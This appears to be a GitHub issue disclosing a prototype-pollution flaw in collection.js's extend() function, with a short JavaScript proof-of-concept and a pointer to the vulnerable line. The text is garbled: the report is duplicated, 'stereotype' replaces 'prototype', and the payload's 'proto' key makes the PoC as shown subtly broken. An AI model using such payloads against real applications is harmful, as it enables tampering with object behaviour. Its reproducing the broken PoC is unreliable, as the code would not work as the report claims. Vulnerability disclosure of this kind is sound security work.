Hi,i found the prototype pollution when use the function extend().
The extend function at line 319 in file Collection.js/dist/node/iterators/extend js passes obj the inner value of args, whose stereotype contains the test attribute
the POC is :
var collection = require("collection.js")
bad_payload = JSON.parse('{"proto":{"polluted":"yes"}}');
collection.extend(true,{},bad_payload)
console.log("result:"+ {}.polluted)
the risk line is here:
Hi,i found the prototype pollution when use the function extend().
The extend function at line 319 in file Collection.js/dist/node/iterators/extend js passes obj the inner value of args, whose stereotype contains the test attribute
the POC is :
var collection = require("collection.js")
bad_payload = JSON.parse('{"proto":{"polluted":"yes"}}');
collection.extend(true,{},bad_payload)
console.log("result:"+ {}.polluted)
the risk line is here:
Collection/dist/node/iterators/extend.js
Line 324 in be32c48
The text was updated successfully, but these errors were encountered: